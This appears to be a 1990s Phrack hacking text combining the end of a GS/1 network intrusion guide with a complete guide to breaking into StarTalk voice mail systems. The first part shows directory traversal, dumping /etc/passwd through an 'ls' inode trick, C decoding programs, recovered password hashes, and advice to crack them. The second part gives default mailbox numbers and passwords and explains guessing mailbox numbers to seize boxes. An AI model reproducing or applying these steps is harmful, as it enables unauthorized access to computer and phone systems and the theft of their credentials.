There are a couple of problems:
|
|||
|
|
|||
|
> (!2) Remote: cat
|
|||
|
> Invalid REMOTE command
|
|||
|
>
|
|||
|
> (!2) Remote: cd /etc
|
|||
|
> Invalid REMOTE command
|
|||
|
|
|||
|
You cannot view files and you cannot change directories.
|
|||
|
|
|||
|
To solve the "cd" problem do the following:
|
|||
|
|
|||
|
> (!2) Remote: ls -l ..
|
|||
|
> total 26
|
|||
|
> drwxrwxrwx 12 root root 352 Jun 5 00:59 NCS
|
|||
|
> drwxr-xr-x 2 bin bin 112 Aug 17 1989 adm
|
|||
|
> drwxrwx--- 2 sysinfo sysinfo 48 Aug 17 1989 backup
|
|||
|
> drwxr-xr-x 2 bin bin 1552 Aug 17 1989 bin
|
|||
|
> drwxr-xr-x 20 bin bin 720 Aug 17 1989 lib
|
|||
|
> drwxrwxrwx 6 ncs ncs 224 Aug 17 1989 ncs
|
|||
|
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 preserve
|
|||
|
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 pub
|
|||
|
> drwxr-xr-x 7 bin bin 144 Aug 17 1989 spool
|
|||
|
> drwxr-xr-x 9 bin bin 144 Aug 17 1989 sys
|
|||
|
> drwxr-x--- 2 root root 48 Aug 17 1989 sysadm
|
|||
|
> drwxrwxrwx 2 bin bin 48 Jun 5 01:00 tmp
|
|||
|
>
|
|||
|
> (!2) Remote: ls -l ../..
|
|||
|
> total 1402
|
|||
|
> -rw-r--r-- 1 root root 1605 Aug 17 1989 .login
|
|||
|
> -r--r--r-- 1 ncs ncs 1605 Aug 28 1990 .login.ncs
|
|||
|
> -rw-r--r-- 1 root root 653 Aug 17 1989 .logout
|
|||
|
> -r--r--r-- 1 ncs ncs 653 Aug 28 1990 .logout.ncs
|
|||
|
> -rw------- 1 root root 427 Aug 17 1989 .profile
|
|||
|
> drwxr-xr-x 2 bin bin 2048 Aug 17 1989 bin
|
|||
|
> -r-------- 1 bin bin 25526 May 4 1989 boot
|
|||
|
> drwxr-xr-x 6 bin bin 3776 Aug 17 1989 dev
|
|||
|
> -r-------- 1 bin bin 577 Nov 3 1987 dos
|
|||
|
> drwxr-xr-x 5 bin bin 1904 Jun 2 12:40 etc
|
|||
|
> drwxr-xr-x 2 bin bin 64 Aug 17 1989 lib
|
|||
|
> drwx------ 2 bin bin 1024 Aug 17 1989 lost+found
|
|||
|
> drwxr-xr-x 2 bin bin 32 Aug 17 1989 mnt
|
|||
|
> drwxrwxrwx 2 bin bin 512 Jun 5 01:20 tmp
|
|||
|
> drwxr-xr-x 14 bin bin 224 Aug 17 1989 usr
|
|||
|
> -rw-r--r-- 1 bin bin 373107 Aug 17 1989 xenix
|
|||
|
> -rw-r--r-- 1 root root 287702 Aug 17 1989 xenix.old
|
|||
|
|
|||
|
Your brain should now experience deja vous.. you just found the
|
|||
|
root directory. (for the non-*nix, lam0-hacker, the root directory
|
|||
|
has key *nix directories such as /etc, /bin, /dev, /lib, etc. in it.)
|
|||
|
|
|||
|
Now you can get to /etc/passwd as follows:
|
|||
|
|
|||
|
> (!2) Remote: ls -l ../../etc
|
|||
|
> total 1954
|
|||
|
> -rwx--x--x 1 bin bin 7110 May 8 1989 accton
|
|||
|
> -rwx------ 1 bin bin 1943 May 8 1989 asktime
|
|||
|
> -rwx------ 1 bin bin 31756 May 8 1989 badtrk
|
|||
|
> -rw-rw-rw- 1 root root 1200 Apr 24 12:40 bootlog
|
|||
|
> -rwx--x--x 1 bin bin 24726 May 8 1989 brand
|
|||
|
> -rw-r--r-- 1 bin bin 17 Aug 17 1989 checklist
|
|||
|
> -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.last
|
|||
|
> -rw-r--r-- 1 ncs ncs 17 Aug 28 1990 checklist.ncs
|
|||
|
> -rw-r--r-- 2 bin bin 17 Aug 17 1989 checklist.orig
|
|||
|
> -rwx------ 1 bin bin 2857 May 8 1989 chsh
|
|||
|
> -rwx------ 1 bin bin 7550 May 8 1989 clri
|
|||
|
> -rwx------ 1 bin bin 8034 May 8 1989 cmos
|
|||
|
> -rwxr-xr-x 1 root bin 31090 Aug 28 1990 cron
|
|||
|
> -rw-r--r-- 1 bin bin 369 May 8 1989 cshrc
|
|||
|
> ...... etc.
|
|||
|
> -rw-r--r-- 1 root root 465 Mar 5 1991 passwd
|
|||
|
|
|||
|
Yeah, now what?!
|
|||
|
|
|||
|
You've found the /etc/passwd file, but you don't have "cat" to type the
|
|||
|
file out. Now you're stuck... so drink a half a bottle of Sysco per
|
|||
|
person. (We did... and as you'll see, Sysco is the drink of a manly hackers
|
|||
|
like us... make sure it's the big bottle kind not those girly small
|
|||
|
onez.)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+---------------------------------------------+
|
|||
|
+ #6. Getting the boot server password file +
|
|||
|
+---------------------------------------------+
|
|||
|
|
|||
|
There is one way to get around the cat problem (no itz n0t puttin
|
|||
|
catnip laced with somethin U made frum a phile on yer doorstep)
|
|||
|
It's done using ls. On this Xenix system, the directory structure is
|
|||
|
the old Unix format: A 16 byte record comprised of a 2 byte I-number
|
|||
|
and a 14 byte character field.
|
|||
|
|
|||
|
Note about directory structure for the inquisitive hacker:
|
|||
|
In a directory record there is a 14 byte string containing the file
|
|||
|
name, and the 2 byte I-number (2 bytes = an integer in this case)
|
|||
|
which is a number that is an (I)ndex pointer to the I-node. The
|
|||
|
I-node then contains the information about where the file's data is
|
|||
|
actually kept (similar to how a FAT table works on an IBM PC yet a
|
|||
|
different concept as it has indirect index blocks etc. I won't get
|
|||
|
into) and what permissions are set for the file. Be warned that in
|
|||
|
newer *nix implementations, file names can be more than 14 characters
|
|||
|
and the directory structure will be a bit different than discussed.
|
|||
|
|
|||
|
The "ls" command has an option that allows you to tell it "this *file* is
|
|||
|
a *directory*.. so show me what's in the directory"... newer *nix
|
|||
|
systems won't like this (the -f option) because of the new directory
|
|||
|
structure.
|
|||
|
|
|||
|
> (!2) Remote: ls -?
|
|||
|
> ls: illegal option --?
|
|||
|
> usage: -1ACFRabcdfgilmnopqrstux [files]
|
|||
|
>
|
|||
|
> (!2) Remote: ls -1ACFRabcdfgilmnopqrstux ../../etc/passwd
|
|||
|
> 28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
|
|||
|
> 25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
|
|||
|
> 29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
|
|||
|
> 28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
|
|||
|
> 28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
|
|||
|
> 29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
|
|||
|
> 20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
|
|||
|
> 26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
|
|||
|
> 12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
|
|||
|
> 29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
|
|||
|
> 29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
|
|||
|
> 18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFnHnL
|
|||
|
> 22327 xcU:100:100:NC 8275 operator:/usr/
|
|||
|
>
|
|||
|
> (!2) Remote: <BRK>
|
|||
|
> (!2) GS/1#
|
|||
|
|
|||
|
Wow, kewl. Now that you have a bunch-o-shit on your screen, you have
|
|||
|
to make some sense out of it.
|
|||
|
|
|||
|
The password file is almost legible, but the I-numbers still need to be
|
|||
|
converted to ASCII characters. This can be accomplished in a variety of
|
|||
|
ways... the easiest is to write a program like the following in C:
|
|||
|
|
|||
|
On a PC the following code should work:
|
|||
|
|
|||
|
#include <stdio.h>
|
|||
|
main()
|
|||
|
{
|
|||
|
union {
|
|||
|
int i;
|
|||
|
char c[2];
|
|||
|
} x;
|
|||
|
while (1) {
|
|||
|
printf("Enter I-Number: ");
|
|||
|
scanf("%d", &x.i);
|
|||
|
printf("%d = [%c][%c]\n\n", x.i, x.c[0], x.c[1]);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
On a *nix based system the following code will work (depending on
|
|||
|
word size and byte arrangement):
|
|||
|
|
|||
|
#include <stdio.h>
|
|||
|
main()
|
|||
|
{
|
|||
|
union {
|
|||
|
short int i;
|
|||
|
char c[2];
|
|||
|
} x;
|
|||
|
while (1) {
|
|||
|
printf("Enter I-Number: ");
|
|||
|
scanf("%hd", &x.i);
|
|||
|
printf("%d = [%c][%c]\n\n", x.i, x.c[1], x.c[0]);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
When you have translated the I-numbers you can substitute the ASCII
|
|||
|
values by hand (or write a d0p3 program to do it for you):
|
|||
|
|
|||
|
28530 ot:BJlx/e8APHe 30580 :0:0:Super use 14962 /:/bin/csh?sys
|
|||
|
28530 = [r][o] 30580 = [t][w] 14962 = [r][:]
|
|||
|
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
|
|||
|
|
|||
|
25697 m:X/haSqFDwHz1 14929 0:0:System Adm 28265 istration:/usr
|
|||
|
25697 = [a][d] 14929 = [Q][:] 28265 = [i][n]
|
|||
|
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
|
|||
|
|
|||
|
29487 ysadm:/bin/sh? 29283 on:NOLOGIN:1:1 17210 ron daemon for
|
|||
|
29487 = [/][s] 29283 = [c][r] 17210 = [:][C]
|
|||
|
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
|
|||
|
|
|||
|
28704 eriodic tasks: 14895 ?bin:NOLOGIN:3 13114 :System file a
|
|||
|
28704 = [ ][p] 14895 = [/][:] 13114 = [:][3]
|
|||
|
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
|
|||
|
|
|||
|
28004 inistration:/: 29962 ucp::4:4:Uucp 25697 ministration:/
|
|||
|
28004 = [d][m] 29962 = [^M][u] 25697 = [a][d]
|
|||
|
dministration:/:
|
|||
|
uucp::4:4:Uucp administration:/
|
|||
|
|
|||
|
29557 r/spool/uucppu 27746 ic:/usr/lib/uu 28771 /uucico?asg:NO
|
|||
|
29557 = [u][s] 27746 = [b][l] 28771 = [c][p]
|
|||
|
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
|
|||
|
|
|||
|
20300 GIN:6:6:Assign 25185 le device admi 26990 stration:/:?sy
|
|||
|
20300 = [L][O] 25185 = [a][b] 26990 = [n][i]
|
|||
|
LOGIN:6:6:Assignable device administration:/:?sy
|
|||
|
|
|||
|
26995 nfo:NOLOGIN:10 12602 0:Access to sy 29811 em information
|
|||
|
26995 = [s][i] 12602 = [:][1] 29811 = [s][t]
|
|||
|
sinfo:NOLOGIN:10:10:Access to system information
|
|||
|
|
|||
|
12090 :?network:NOLO 18759 N:12:12:Mail a 25710 Network admin
|
|||
|
12090 = [:][/] 18759 = [G][I] 25710 = [n][d]
|
|||
|
:/:?network:NOLOGIN:12:12:Mail and Network admin
|
|||
|
|
|||
|
29545 tration:/usr/s 28528 ol/micnet:?lp: 20302 LOGIN:14:3:Pri
|
|||
|
29545 = [i][s] 28528 = [p][o] 20302 = [N][O]
|
|||
|
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
|
|||
|
|
|||
|
29806 spooler admin 29545 tration:/usr/s 28528 ol/lp:?dos:NOL
|
|||
|
29806 = [n][t] 29545 = [i][s] 28528 = [p][o]
|
|||
|
nt spooler administration:/usr/spool/lp:?dos:NOL
|
|||
|
|
|||
|
18255 IN:16:10:Acces 8307 to Dos devices 12090 :?ncs:yYNFmHnL
|
|||
|
18255 = [O][G] 8307 = [s][ ] 12090 = [:][/]
|
|||
|
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFnHnL
|
|||
|
|
|||
|
22327 xcU:100:100:NC 8275 operator:/usr/
|
|||
|
22327 = [7][W] 8275 = [S][ ]
|
|||
|
7WxcU:100:100:NCS operator:/usr
|
|||
|
|
|||
|
|
|||
|
The resulting file will look like the following:
|
|||
|
|
|||
|
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh?sys
|
|||
|
adm:X/haSqFDwHz1Q:0:0:System Administration:/usr
|
|||
|
/sysadm:/bin/sh?cron:NOLOGIN:1:1:Cron daemon for
|
|||
|
periodic tasks:/:?bin:NOLOGIN:3:3:System file a
|
|||
|
dministration:/:
|
|||
|
uucp::4:4:Uucp administration:/
|
|||
|
usr/spool/uucppublic:/usr/lib/uucp/uucico?asg:NO
|
|||
|
LOGIN:6:6:Assignable device administration:/:?sy
|
|||
|
sinfo:NOLOGIN:10:10:Access to system information
|
|||
|
:/:?network:NOLOGIN:12:12:Mail and Network admin
|
|||
|
istration:/usr/spool/micnet:?lp:NOLOGIN:14:3:Pri
|
|||
|
nt spooler administration:/usr/spool/lp:?dos:NOL
|
|||
|
OGIN:16:10:Access to Dos devices:/:?ncs:yYNFmHnL
|
|||
|
7WxcU:100:100:NCS operator:/usr
|
|||
|
|
|||
|
Because the ls command cannot display "non-printable" characters such
|
|||
|
as the carriage return, it will replace them with a '?' character...
|
|||
|
delete the '?' characters and divide by line at these locations. When
|
|||
|
you finish doing that, you'll have a standard /etc/passwd file:
|
|||
|
|
|||
|
root:BJlx/e8APHetw:0:0:Super user:/:/bin/csh
|
|||
|
sysadm:X/haSqFDwHz1Q:0:0:System Administration:/usr/sysadm:/bin/sh
|
|||
|
cron:NOLOGIN:1:1:Cron daemon for periodic tasks:/:
|
|||
|
bin:NOLOGIN:3:3:System file administration:/:
|
|||
|
uucp::4:4:Uucp administration:/usr/spool/uucppublic:/usr/lib/uucp/uucico
|
|||
|
asg:NOLOGIN:6:6:Assignable device administration:/:
|
|||
|
sysinfo:NOLOGIN:10:10:Access to system information:/:
|
|||
|
network:NOLOGIN:12:12:Mail and Network administration:/usr/spool/micnet:
|
|||
|
lp:NOLOGIN:14:3:Print spooler administration:/usr/spool/lp:
|
|||
|
dos:NOLOGIN:16:10:Access to Dos devices:/:
|
|||
|
ncs:yYNFmHnL7WxcU:100:100:NCS operator:/usr
|
|||
|
|
|||
|
Once you've assembled your password file in a standard ASCII form,
|
|||
|
you'll of course want to crack it with one of the many available DES
|
|||
|
cracking programs.
|
|||
|
|
|||
|
+---------------------+
|
|||
|
+ #7: Other Avenues +
|
|||
|
+---------------------+
|
|||
|
|
|||
|
Find out what else you can play with by first finding what networks are
|
|||
|
available other than your own, and second, find out what machines are on
|
|||
|
your network:
|
|||
|
|
|||
|
>(!2) GS/1# sh att
|
|||
|
> Attached Networks
|
|||
|
>&000023B5
|
|||
|
>(!2) GS/1# sh nmap l
|
|||
|
> NETWORK &000023B5 MAP
|
|||
|
>
|
|||
|
> 1-%070002017781 SW/AT-NCS 3.0.2 2-%070002A049C5 SW/NB-BR-3.1.1.1
|
|||
|
> 3-%0700020269A7 SW/200-A/BSC/SDL22000 4-%07000201C089 SW/200-A/BSC/SDL22020
|
|||
|
> 5-%070002023644 SW/200-A/BSC/SDL22020 6-%0700020138B2 SW/AT-NCS 2.1.1
|
|||
|
> 7-%070002010855 SW/100-A/BSC 20060 8-%070002018BA2 SW/20-XNS-X.25 .0.2
|
|||
|
> .... etc.
|
|||
|
|
|||
|
The boot server address, from previous examples, is number 1
|
|||
|
which contains a description "SW/AT-NCS". Examining the rest of the
|
|||
|
list, number 6 has the same description. System 12 may be just another
|
|||
|
address for the boot server or it may be a different Xenix... but it should
|
|||
|
be Xenix whatever it is.
|
|||
|
|
|||
|
We have refrained from covering the typical GS/1 information that has been
|
|||
|
published by others; and instead, covered newer concepts in GS/1 hacking.
|
|||
|
This phile is not a complete guide to GS/1 hacking; but expect successive
|
|||
|
publications on the topic.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 18 of 26
|
|||
|
|
|||
|
****************************************************************************
|
|||
|
|
|||
|
***** ******** **** ***** ******** **** ** ** **
|
|||
|
***** **** ** ** ** ** **** ** ** ** ** ***
|
|||
|
**** **** ** ** ** ** ** **** ** ** ** ** *****
|
|||
|
***** **** ** ** ** *** **** ** ** ****** ** ***
|
|||
|
|
|||
|
(*) A Complete 'N Easy Guide to Hacking and the (*)
|
|||
|
(*) Usage of "StarTalk" Voice Mail Systems (*)
|
|||
|
|
|||
|
Written By: The Red Skull
|
|||
|
07/25/94
|
|||
|
|
|||
|
Introduction
|
|||
|
~~~~~~~~~~~~
|
|||
|
There are many types of different voice mail systems out there, that
|
|||
|
run on phone systems they are compatible with. You have probably seen a lot
|
|||
|
of text files about hacking voice mail systems, on your local bulletin
|
|||
|
boards. The popular ones you might have heard about are systems like, Aspen
|
|||
|
(Automatic Speech Exchange Network), TMC (The Message Center), Audix, and
|
|||
|
Meridian Mail. There are VMB hacking programs that are suppose to hack vmbs
|
|||
|
for you. I really don't believe in those kind of programs. When I say this,
|
|||
|
I am not talking about programs like Tone Locator or Blue Beep, I am talking
|
|||
|
about programs like 'The Aspen Hacker' and any other *VMB* hacking programs.
|
|||
|
I am just saying this, so you don't mix this guide up with a vmb hacking
|
|||
|
program.
|
|||
|
|
|||
|
General Information
|
|||
|
~~~~~~~~~~~~~~~~~~~
|
|||
|
I have decided to write a hacking/user's guide for the StarTalk Voice
|
|||
|
Mail System because there is no guide for the StarTalk Voice Mail System,
|
|||
|
and almost no one has heard about it. Since this will be the first one for
|
|||
|
it, I will try and explain it as simply as possible. You might have heard
|
|||
|
of Northern Telecom. They are the makers of StarTalk, but they are also the
|
|||
|
makers of a very popular user-friendly Voice Mail System called 'Meridian
|
|||
|
Mail'. Both StarTalk and Meridian Mail run on the Norstar telephone system.
|
|||
|
StarTalk is designed to function as an extension of the Norstar telephone
|
|||
|
system. All the StarTalk software operation is done on a Norstar telephone
|
|||
|
set, so that means it doesn't run on a computer terminal. There are 3
|
|||
|
different sizes and configurations that the StarTalk Voice Mail System
|
|||
|
comes with -
|
|||
|
|
|||
|
o Model 110 - 2 voice channels, with 1 hour and 50
|
|||
|
minutes total storage.
|
|||
|
|
|||
|
o Model 165 - 4 voice channels, with 2 hours and 45
|
|||
|
minutes total storage.
|
|||
|
|
|||
|
o Model 385 - 4 voice channels, with 6 hours and 25
|
|||
|
minutes total storage.
|
|||
|
The capabilities of StarTalk Model 385
|
|||
|
can be further expanded through an
|
|||
|
enhancement option, available in 4, 6
|
|||
|
or 8 channel versions, which provides
|
|||
|
a total of 9 hours an 45 minutes of
|
|||
|
storage.
|
|||
|
|
|||
|
Right now, you might be wondering what the hell i'm talking about, but
|
|||
|
it's simple. The number of voice channels means how many voice mail users
|
|||
|
could be using their voice mail. So for example, 4 voice channels, means only
|
|||
|
4 voice mail users could be on the voice mail system. The Model 110 can hold
|
|||
|
about 25 boxes, the Model 165 can hold 50 boxes and the Model 385 can hold 120
|
|||
|
boxes and higher. So, it's better if you find a StarTalk Voice Mail System
|
|||
|
that is running Model 385. The part that says 'with 6 hours and 25 minutes
|
|||
|
total storage', means how many hours of messages it can store. The Model 385
|
|||
|
is also upgradable. I could go on about the models but that's all we need to
|
|||
|
know for now. So now that we've finished this, we will get into the part
|
|||
|
that you've been waiting for.
|
|||
|
|
|||
|
Finding a StarTalk Voice Mail System
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
You will probably not be able to recognize a StarTalk voice mail system
|
|||
|
if you find one using a war dialer, because when a StarTalk system answers,
|
|||
|
it will only have the company's personalized automated greeting. There are
|
|||
|
only two ways to get a StarTalk system: you either scan it out yourself or
|
|||
|
get it from someone else. If you get it from someone else, all the boxes
|
|||
|
will probably be gone, used or just not safe.
|
|||
|
|
|||
|
Recognizing a StarTalk Voice Mail System
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
Ok, now let's say you have come across a StarTalk system, how do you
|
|||
|
know that it's a StarTalk? As I said, you will not be able to tell if it's a
|
|||
|
StarTalk system by just calling it. If the system is a Startalk, when the
|
|||
|
company's personalized greeting answers, press '*' and it should say -
|
|||
|
|
|||
|
"Please enter the mailbox number, or press the # sign to use the directory"
|
|||
|
|
|||
|
Remember, if you press '*' and just sit there, it will repeat the message
|
|||
|
one more `time, and then say "Exiting the system."
|
|||
|
|
|||
|
If you hit '**' it should say -
|
|||
|
|
|||
|
"Please enter your mailbox number and your password, then press # sign"
|
|||
|
|
|||
|
If you don't get anything like this, that means it's not a StarTalk Voice
|
|||
|
Mail System. If you are still not sure that you have a StarTalk System,
|
|||
|
then you can always call 416-777-2020 and listen to the voice and see
|
|||
|
if it matches with what you have found.
|
|||
|
|
|||
|
Finding a Virgin Box
|
|||
|
~~~~~~~~~~~~~~~~~~~~
|
|||
|
This is a very interesting step and also an easy one. Once you have
|
|||
|
found a StarTalk Voice Mail System, the first thing you'll want to do is
|
|||
|
get some boxes on it. The interesting part is that you are always guaranteed
|
|||
|
to get one box on a StarTalk System. This is because every StarTalk System
|
|||
|
has a box that is for the voice mail users to leave any problems they are
|
|||
|
experiencing with their vmb. This is the box that almost always has a default
|
|||
|
on it, but if the System Admin is smart he will change it. So far, on all the
|
|||
|
StarTalk systems that I have come across the default for this box hasn't been
|
|||
|
changed. The box number is '101' and the defaults for StarTalk Voice Mail
|
|||
|
systems are '0000'. So the first thing you should do is call up the system
|
|||
|
and press *101 and the default greeting on the box should say (this greeting
|
|||
|
is for box 101 only) -
|
|||
|
|
|||
|
"This is the Trouble-Report mailbox, if you are experiencing difficulty
|
|||
|
using the messaging features, please leave your name, mailbox # and a
|
|||
|
detailed description of the problem" *BEEP*
|
|||
|
|
|||
|
If it says that, press '**' and then when it asks you to enter your mailbox
|
|||
|
number and your password, enter '1010000' and press the # sign. If you've
|
|||
|
followed everything I've said and the System Admin hasn't changed the
|
|||
|
default on this box, it should go ahead and ask you to enter your new
|
|||
|
personal mailbox password. There is another box number which is sometimes
|
|||
|
at the default which is the System Admin's box at 102. Although this is a
|
|||
|
System Admin box, the only System Admin option it has available is to leave
|
|||
|
a broadcast message, which leaves a message to all boxes on the system.
|
|||
|
This box will have the regular default greeting which is -
|
|||
|
|
|||
|
"This mailbox is not initialized and cannot accept messages, please
|
|||
|
try again later"
|
|||
|
|
|||
|
Do the same thing you did before, If it says that, press '**' and then when
|
|||
|
it asks you to enter your mailbox number and your password, enter '1020000'
|
|||
|
and press the # sign. If everything is fine, it should ask you to enter your
|
|||
|
new personal mailbox password. This is called Initializing your mailbox, and
|
|||
|
I'll talk about this later in this file. So, there you go, you've got your
|
|||
|
box on a StarTalk System. All StarTalk Voice Mail Systems that I have run
|
|||
|
into so far have had 2-3 digit mailboxes. Now, to hack any other boxes
|
|||
|
through the system, you would have to go and keep on trying 3 digit mailbox
|
|||
|
number starting with 1XX, until you find an empty box with a regular default
|
|||
|
greeting. Let's say you find another empty box at box number 130, you will do
|
|||
|
the same thing, press '**' and when it asks you to enter your mailbox number
|
|||
|
and your password, enter '1300000' and press the # sign. One thing I like
|
|||
|
about box number '101' is that, a lot of System Admin's are not aware that it
|
|||
|
even exists, that is because they probably have a lousy TSR (Technical Service
|
|||
|
Rep). (This is the person that is suppose to help them install the Voice
|
|||
|
Mail System.)
|
|||
|
|
|||
|
What to do After you've Got A StarTalk Voice Mail Box
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
The rest of the file will concentrate on all the inside functions and
|
|||
|
options that a StarTalk Voice Mail Box has. We will be covering all
|
|||
|
these topics -
|
|||
|
|
|||
|
o Initializing a Mailbox
|
|||
|
o Your Mailbox Greeting
|
|||
|
o Recording a Greeting
|
|||
|
o Choosing a Mailbox Greeting
|
|||
|
o Listening To Messages
|
|||
|
o Off-premise Message Notification
|
|||
|
o Setting Up Off-premise Message Notification
|
|||
|
o Disabling Off-premise Message Notification
|
|||
|
o Changing Off-premise Message Notification
|
|||
|
o Leaving a Mailbox Message
|
|||
|
o Message Delivery Options
|
|||
|
o Assigning the Target Attendant
|
|||
|
o Quick Reference Tips
|
|||
|
|
|||
|
Your Mailbox
|
|||
|
~~~~~~~~~~~~
|
|||
|
Before you can use your mailbox, you must:
|
|||
|
|
|||
|
- open your mailbox
|
|||
|
- change your password
|
|||
|
- record your name
|
|||
|
- record your personal mailbox greeting(s)
|
|||
|
|
|||
|
This is called Initializing your mailbox.
|
|||
|
|
|||
|
Initializing a Mailbox
|
|||
|
----------------------
|
|||
|
To open and initialize your mailbox:
|
|||
|
|
|||
|
1. Press * * and Mailbox #
|
|||
|
2. Enter the default password '0000'
|
|||
|
3. To end the password, press #
|
|||
|
4. The StarTalk voice prompt, asks you to enter your new personal mailbox
|
|||
|
password.
|
|||
|
5. Using touchtones, enter your new mailbox password. Your password can
|
|||
|
be from 4 to 8 digits long, but it cannot start with zero.
|
|||
|
6. To end your password, press #
|
|||
|
7. After you have accepted your password, you are asked to record your name
|
|||
|
in the Company Directory, At the tone, record your name.
|
|||
|
8. To end your recording, press #
|
|||
|
9. To accept your recording, press #
|
|||
|
|
|||
|
You are now ready to record your personal mailbox greetings. Once your
|
|||
|
greetings are recorded, you have the option of selecting either your primary
|
|||
|
or alternate greeting. If you do not select a greeting, your primary
|
|||
|
greeting plays automatically.
|
|||
|
|
|||
|
Note: Initializing a mailbox is only done the first time you open your
|
|||
|
mailbox. You have to initialize your mailbox to receive messages.
|
|||
|
|
|||
|
Your Mailbox Greeting
|
|||
|
~~~~~~~~~~~~~~~~~~~~~
|
|||
|
Each mailbox has a primary and alternate greeting recorded by you.
|
|||
|
After you have recorded your personal mailbox greetings, you can choose
|
|||
|
which greeting you play to callers reaching your mailbox.
|
|||
|
|
|||
|
Recording a Greeting
|
|||
|
--------------------
|
|||
|
To record your greetings, you must first open your mailbox. Once you have
|
|||
|
opened your mailbox:
|
|||
|
|
|||
|
1. Press 8
|
|||
|
2. To select Greeting Options, press 2
|
|||
|
3. To record your greeting, press 1
|
|||
|
4. Select which greeting you are going to record.
|
|||
|
Note: You can choose to record either your primary or alternate mailbox
|
|||
|
greeting.
|
|||
|
5. To record your greeting, press 1
|
|||
|
6. At the tone, record your greeting.
|
|||
|
7. To end your greeting, press #
|
|||
|
8. To accept this recording, press #
|
|||
|
|
|||
|
Choosing a Mailbox Greeting
|
|||
|
---------------------------
|
|||
|
After the mailbox greeting is recorded, you can choose which greeting you
|
|||
|
are going to use. If you do not choose a mailbox greeting, Startalk
|
|||
|
automatically plays your primary greeting. To choose a mailbox greeting
|
|||
|
you must open your mailbox. Once you have opened your mailbox:
|
|||
|
|
|||
|
1. Press 8
|
|||
|
2. To select Greeting Options, press 2
|
|||
|
3. Press 2
|
|||
|
4. Select which mailbox greeting your mailbox is going to use.
|
|||
|
|
|||
|
Listening To Messages
|
|||
|
---------------------
|
|||
|
Each time you open your mailbox, StarTalk plays any Broadcast messages left
|
|||
|
by the System Admin (don't reply to them!), and also tells you how many other
|
|||
|
messages are in your mailbox. Messages are played beginning with any Urgent
|
|||
|
messages, followed by the first message left in your mailbox.
|
|||
|
|
|||
|
To listen to messages, you must open your mailbox. Once you have opened
|
|||
|
your mailbox:
|
|||
|
|
|||
|
1. To listen to messages, press 2 or to listen to your saved messages,
|
|||
|
press 6
|
|||
|
|
|||
|
Your first message starts to play. While listening to a message, or after
|
|||
|
a message has played, you can:
|
|||
|
|
|||
|
Replay the message : 1 1
|
|||
|
Back up 9 seconds : 1
|
|||
|
Pause and Continue : 2 to pause then 2 to continue
|
|||
|
Forward 9 seconds : 3
|
|||
|
Skip to the end of message : 3 3
|
|||
|
Play the previous message : 4
|
|||
|
Forward the message : 5
|
|||
|
Skip to the next message : 6
|
|||
|
Play time and date stamp : 7
|
|||
|
Save a Message : 7 7
|
|||
|
Erase the message : 8
|
|||
|
Reply to the message : 9
|
|||
|
Volume control : *
|
|||
|
|
|||
|
Note: After listening to the messages left in your mailbox and exiting
|
|||
|
StarTalk, all messages you do not erase are automatically saved.
|
|||
|
|
|||
|
|
|||
|
Off-premise Message Notification
|
|||
|
--------------------------------
|
|||
|
Off-premise Message Notification, to a telephone number or a pager, alerts
|
|||
|
you when messages are left in your mailbox. Off-premise Message Notification
|
|||
|
is enabled in the StarTalk Class of Service designation by the System
|
|||
|
Coordinator.
|
|||
|
|
|||
|
Setting Up Off-premise Message Notification
|
|||
|
-------------------------------------------
|
|||
|
To set up Off-premise Message Notification, you must first open your
|
|||
|
mailbox. Once you have opened your mailbox:
|
|||
|
|
|||
|
1. Open the mailbox admin menu, press 8
|
|||
|
2. Open the message notification menu, press 6
|
|||
|
3. To set up message notification, press 1
|
|||
|
4. To select a line, press 1
|
|||
|
Note: You can also select line, pool or intercom.
|
|||
|
(YOU HAVE TO SELECT LINE)
|
|||
|
5. Enter a line, pool or IC number, press #
|
|||
|
Note: You have to enter '1', or '01' as the line if 1 doesn't work.
|
|||
|
6. To accept the line, pool or IC number, press #
|
|||
|
7. Enter the destination telephone number, press #
|
|||
|
Note: While you are entering a telephone number, you can press a dialpad
|
|||
|
number to represent dialtone recognition or other telephone number options.
|
|||
|
When StarTalk is installed with PBX or Centrex and you want to access an
|
|||
|
outside line, you must enter the command to recognize dial tone. For
|
|||
|
example enter 9 to access an outside line, press # then enter 4 to
|
|||
|
recognize dialtone press 2 followed by the destination number, press #
|
|||
|
and any required pauses. Each pause entered is four seconds long.
|
|||
|
8. To end the telephone number, press #
|
|||
|
9. To accept the telephone number, press #
|
|||
|
10. To accept the destination type telephone, press # and move to step 12.
|
|||
|
